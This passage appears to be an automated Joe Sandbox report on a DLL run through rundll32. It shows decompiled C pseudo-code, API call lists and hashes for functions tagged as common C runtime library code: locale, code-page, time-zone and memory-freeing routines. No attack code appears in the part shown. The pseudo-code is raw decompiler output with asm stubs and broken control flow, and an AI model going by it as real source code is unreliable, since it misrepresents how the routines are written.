					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6E25D652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6E25D775();
					} else {
						E6E25D6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6E25DD27("t!\'nE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6E25D775();
							} else {
								E6E25D6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6E25DBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6e24e042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6E25D5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6E242188();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6e2c506c; // 0x8e829fa6
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6E24D5FF(_t89, _t100, _t116);
								_t122 =  *(E6E24D5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6E25E4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6E25806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6E25E5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6E21F8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6E254323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E6E254323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6E267BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6E254323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6E267BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6E265124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}













































                          0x6e25dd96
                          0x6e25dd9b
                          0x6e25dd9c
                          0x6e25dd9d
                          0x6e25dd9f
                          0x6e25dda0
                          0x6e25dda5
                          0x6e25dda8
                          0x6e25ddaa
                          0x6e25ddad
                          0x6e25ddad
                          0x6e25ddb0
                          0x6e25ddb0
                          0x6e25ddb6
                          0x6e25ddb9
                          0x6e25ddbc
                          0x6e25ddbc
                          0x6e25ddbf
                          0x6e25ddc2
                          0x6e25ddc8
                          0x6e25ddca
                          0x6e25ddcf
                          0x6e25ddd9
                          0x6e25ddde
                          0x6e25dde1
                          0x6e25dde1
                          0x6e25dde5
                          0x6e25dde9
                          0x6e25de32
                          0x00000000
                          0x6e25ddeb
                          0x6e25ddf0
                          0x6e25ddf9
                          0x6e25ddf2
                          0x6e25ddf2
                          0x6e25ddf2
                          0x6e25de00
                          0x6e25de04
                          0x6e25de0e
                          0x6e25de13
                          0x6e25de18
                          0x6e25de1e
                          0x6e25de22
                          0x6e25de2b
                          0x6e25de24
                          0x6e25de24
                          0x6e25de24
                          0x6e25de37
                          0x6e25de37
                          0x6e25de37
                          0x6e25de18
                          0x6e25de04
                          0x6e25de3d
                          0x6e25df4f
                          0x6e25df4f
                          0x6e25df4f
                          0x00000000
                          0x6e25de43
                          0x6e25de50
                          0x6e25de56
                          0x00000000
                          0x6e25de86
                          0x6e25de86
                          0x6e25de8b
                          0x6e25de8d
                          0x6e25de8d
                          0x6e25de8f
                          0x6e25de8f
                          0x6e25de94
                          0x6e25df4a
                          0x6e25df4c
                          0x00000000
                          0x6e25de9a
                          0x6e25de9a
                          0x6e25de9d
                          0x6e25dea5
                          0x6e25dea8
                          0x6e25deab
                          0x6e25deab
                          0x6e25deae
                          0x6e25deb1
                          0x6e25deb9
                          0x6e25debe
                          0x6e25dec5
                          0x6e25deca
                          0x6e25decd
                          0x6e25decf
                          0x6e25df5a
                          0x6e25df5b
                          0x6e25df5c
                          0x6e25df5d
                          0x6e25df5e
                          0x6e25df5f
                          0x6e25df64
                          0x6e25df68
                          0x6e25df70
                          0x6e25df77
                          0x6e25df7a
                          0x6e25df7b
                          0x6e25df7f
                          0x6e25df85
                          0x6e25df8d
                          0x6e25df9c
                          0x6e25dfa8
                          0x6e25dfb9
                          0x6e25dfbf
                          0x6e25dfc1
                          0x6e25dfd2
                          0x6e25dfd9
                          0x6e25dfdb
                          0x6e25dfde
                          0x6e25dfe4
                          0x6e25dfe6
                          0x6e25dfe8
                          0x6e25dfe8
                          0x6e25dfeb
                          0x6e25dfee
                          0x6e25dfee
                          0x6e25dfe6
                          0x6e25dff8
                          0x6e25dfc3
                          0x6e25dfc3
                          0x6e25dfc5
                          0x6e25dfff
                          0x6e25e000
                          0x6e25e00b
                          0x6e25ded5
                          0x6e25dede
                          0x6e25dee3
                          0x6e25dee5
                          0x00000000
                          0x6e25dee7
                          0x6e25dee9
                          0x6e25df03
                          0x00000000
                          0x6e25df05
                          0x6e25df05
                          0x6e25df08
                          0x6e25df0e
                          0x6e25df11
                          0x6e25df21
                          0x6e25df34
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25df13
                          0x6e25df13
                          0x6e25df16
                          0x6e25df1c
                          0x6e25df1d
                          0x6e25df1f
                          0x6e25df36
                          0x6e25df42
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25df1f
                          0x6e25df11
                          0x6e25df03
                          0x6e25df51
                          0x6e25df57
                          0x6e25df57
                          0x6e25decf
                          0x6e25de94
                          0x6e25de56

                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,96574AD2), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,96574AD2), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E24E042,?,?,?,?,6E24DA1E,?,00000004), ref: 6E25DE78
                          • _wcschr.LIBVCRUNTIME ref: 6E25DF08
                          • _wcschr.LIBVCRUNTIME ref: 6E25DF16
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,B$n,00000000,?), ref: 6E25DFB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                          • String ID: )'nU$B$n$t!'nE
                          • API String ID: 4212172061-2691769108
                          • Opcode ID: 3410f5026dad02189e62c584e52bcc8349c0951207dd4bb4e4bd8fed7cacce64
                          • Instruction ID: 2b251e721f309d78bfe7e04eb351676c9dd4c35e7766c24981b4a7f2a843bb41
                          • Opcode Fuzzy Hash: 3410f5026dad02189e62c584e52bcc8349c0951207dd4bb4e4bd8fed7cacce64
                          • Instruction Fuzzy Hash: 9D61077651420FABE7149BB5CD45BAB73AEEF05705F10086AE919DB380EB30E5618B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25E518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E6E25E518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6e25e837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e272f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e272f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6E24BF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6e25e837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                          0x6e25e51d
                          0x6e25e51e
                          0x6e25e525
                          0x6e25e5c9
                          0x6e25e5cf
                          0x6e25e5e2
                          0x6e25e5e8
                          0x6e25e5ed
                          0x6e25e5ef
                          0x6e25e5ef
                          0x6e25e5f5
                          0x6e25e5fa
                          0x6e25e5fa
                          0x6e25e5e4
                          0x6e25e5e4
                          0x00000000
                          0x6e25e5e4
                          0x6e25e52b
                          0x6e25e530
                          0x00000000
                          0x00000000
                          0x6e25e536
                          0x6e25e53b
                          0x6e25e53d
                          0x6e25e53d
                          0x6e25e543
                          0x00000000
                          0x00000000
                          0x6e25e548
                          0x6e25e55f
                          0x6e25e55f
                          0x6e25e568
                          0x6e25e56a
                          0x00000000
                          0x00000000
                          0x6e25e56c
                          0x6e25e571
                          0x6e25e573
                          0x6e25e573
                          0x6e25e579
                          0x00000000
                          0x00000000
                          0x6e25e57e
                          0x6e25e59c
                          0x6e25e59e
                          0x6e25e5c1
                          0x00000000
                          0x6e25e5c6
                          0x6e25e5a6
                          0x6e25e5b9
                          0x00000000
                          0x00000000
                          0x6e25e5bb
                          0x00000000
                          0x6e25e5bb
                          0x6e25e580
                          0x6e25e588
                          0x00000000
                          0x00000000
                          0x6e25e58a
                          0x6e25e58d
                          0x6e25e593
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25e595
                          0x6e25e597
                          0x6e25e599
                          0x00000000
                          0x6e25e599
                          0x6e25e54a
                          0x6e25e552
                          0x00000000
                          0x00000000
                          0x6e25e554
                          0x6e25e557
                          0x6e25e55d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25e55d
                          0x6e25e563
                          0x6e25e565
                          0x00000000

                          APIs
                          • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6E25E837,?,00000000), ref: 6E25E5B1
                          • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6E25E837,?,00000000), ref: 6E25E5DA
                          • GetACP.KERNEL32(?,?,6E25E837,?,00000000), ref: 6E25E5EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: 7%n$ACP$OCP
                          • API String ID: 2299586839-4090478770
                          • Opcode ID: 646b781da5e3297031d96d5bdb43cd2efe43efc50c8349720b12df6b31ebd355
                          • Instruction ID: 69987023b77f53b8312c72898458cf337b6296a8d7c1e5f85c75278e2aa7208e
                          • Opcode Fuzzy Hash: 646b781da5e3297031d96d5bdb43cd2efe43efc50c8349720b12df6b31ebd355
                          • Instruction Fuzzy Hash: 8821C1B261410EABE7A08FD9CB04A8777B7EB45B21B568465E91AC7308F732DD60C750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25BF64, Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E6E25BF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6e2c50b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6E24CBD3(_t46);
							E6E25C7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6E24CBD3(_t47);
							E6E25CCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6E24CBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6E24CBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6E24CBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6E25C0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6e2c52b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6E24CBD3(_t31);
							E6E24CBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6E24CBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6E24CBD3(_t74);
			}















                          0x6e25bf6c
                          0x6e25bf70
                          0x6e25bf78
                          0x6e25bf81
                          0x6e25bf86
                          0x6e25bf8d
                          0x6e25bf95
                          0x6e25bf9d
                          0x6e25bfa8
                          0x6e25bfae
                          0x6e25bfaf
                          0x6e25bfb7
                          0x6e25bfbf
                          0x6e25bfca
                          0x6e25bfd0
                          0x6e25bfd4
                          0x6e25bfdf
                          0x6e25bfe5
                          0x6e25bf86
                          0x6e25bfe6
                          0x6e25bfee
                          0x6e25c001
                          0x6e25c014
                          0x6e25c022
                          0x6e25c02d
                          0x6e25c032
                          0x6e25c03b
                          0x6e25c043
                          0x6e25c044
                          0x6e25c044
                          0x6e25c04a
                          0x6e25c04d
                          0x6e25c04d
                          0x6e25c050
                          0x6e25c057
                          0x6e25c059
                          0x6e25c05d
                          0x6e25c065
                          0x6e25c06c
                          0x6e25c072
                          0x6e25c073
                          0x6e25c073
                          0x6e25c07a
                          0x6e25c07c
                          0x6e25c081
                          0x6e25c089
                          0x6e25c08e
                          0x6e25c08f
                          0x6e25c08f
                          0x6e25c092
                          0x6e25c095
                          0x6e25c098
                          0x6e25c09b
                          0x6e25c09b
                          0x6e25c0ad

                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 6E25BFA8
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C7EC
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C7FE
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C810
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C822
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C834
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C846
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C858
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C86A
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C87C
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C88E
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8A0
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8B2
                            • Part of subcall function 6E25C7CF: _free.LIBCMT ref: 6E25C8C4
                          • _free.LIBCMT ref: 6E25BF9D
                            • Part of subcall function 6E24CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000), ref: 6E24CBE9
                            • Part of subcall function 6E24CBD3: GetLastError.KERNEL32(00000000,?,6E25CFAF,00000000,00000000,00000000,00000000,?,6E25D2B4,00000000,00000007,00000000,?,6E25C0FC,00000000,00000000), ref: 6E24CBFB
                          • _free.LIBCMT ref: 6E25BFBF
                          • _free.LIBCMT ref: 6E25BFD4
                          • _free.LIBCMT ref: 6E25BFDF
                          • _free.LIBCMT ref: 6E25C001
                          • _free.LIBCMT ref: 6E25C014
                          • _free.LIBCMT ref: 6E25C022
                          • _free.LIBCMT ref: 6E25C02D
                          • _free.LIBCMT ref: 6E25C065
                          • _free.LIBCMT ref: 6E25C06C
                          • _free.LIBCMT ref: 6E25C089
                          • _free.LIBCMT ref: 6E25C0A1
                          Memory Dump Source
                          • Source File: 00000002.00000002.491922041.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000002.00000002.490968383.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.507696729.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511770021.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511847057.000000006E2C8000.00000040.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511938993.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000002.00000002.511969094.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: 9e2b707382a9bce83ac7c2478675cdbb2857b87fa4640b4bb6638e2bbf7300ad
                          • Instruction ID: 8e10108ec5c9639180e93905bc15030a070d53f974845a8b297362a1babc60cf
                          • Opcode Fuzzy Hash: 9e2b707382a9bce83ac7c2478675cdbb2857b87fa4640b4bb6638e2bbf7300ad
                          • Instruction Fuzzy Hash: 63319E3560430EDFFB648BB8D942B9673FBAF00B15F204829E069CB251EF75A9648B10
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370timeCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E6E25877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6E25822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6E258289( &_v8) != 0 || E6E258231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6E242188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6E25822B();
					_t32 =  &_v52; // 0x6e272130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6E258289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6E242188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6e2c506c; // 0x8e829fa6
						_v100 = _t74 ^ _t192;
						 *0x6e2c5384 =  *0x6e2c5384 | 0xffffffff;
						 *0x6e2c5378 =  *0x6e2c5378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6e2c7a10 = 0;
						_t78 = E6E251216(0x6e272130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6e272130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6E24F26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6E251216(0x6e272130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6e272130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6E24CBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6E24CBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6E25877C(0x6e272130, _t172, __eflags);
							}
						}
						E6E24CBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6E21F8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6E258231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6E25825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6E24CBD3( *0x6e2c7a08);
								 *0x6e2c7a08 = 0;
								 *_t194 = 0x6e2c7a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6e2c7a18 * 0x3c;
									_t168 =  *0x6e2c7a6c; // 0x0
									_push(_t171);
									 *0x6e2c7a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6e2c7a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6e2c7ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6e2c7ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6E243CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6e2c7a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6e2c7a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6E258225()) = _v12;
								 *((intOrPtr*)(E6E258219())) = _v16;
								_t96 = E6E25821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6e2c7a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6E24CBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6e258b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6e258b6e
						 *0x6e2c7a08 = E6E24F26D(_t154 - _t170, _t13);
						_t116 = E6E24CBD3(0);
						_t167 =  *0x6e2c7a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6e258b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6e258b6e
							_t119 = E6E24AB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
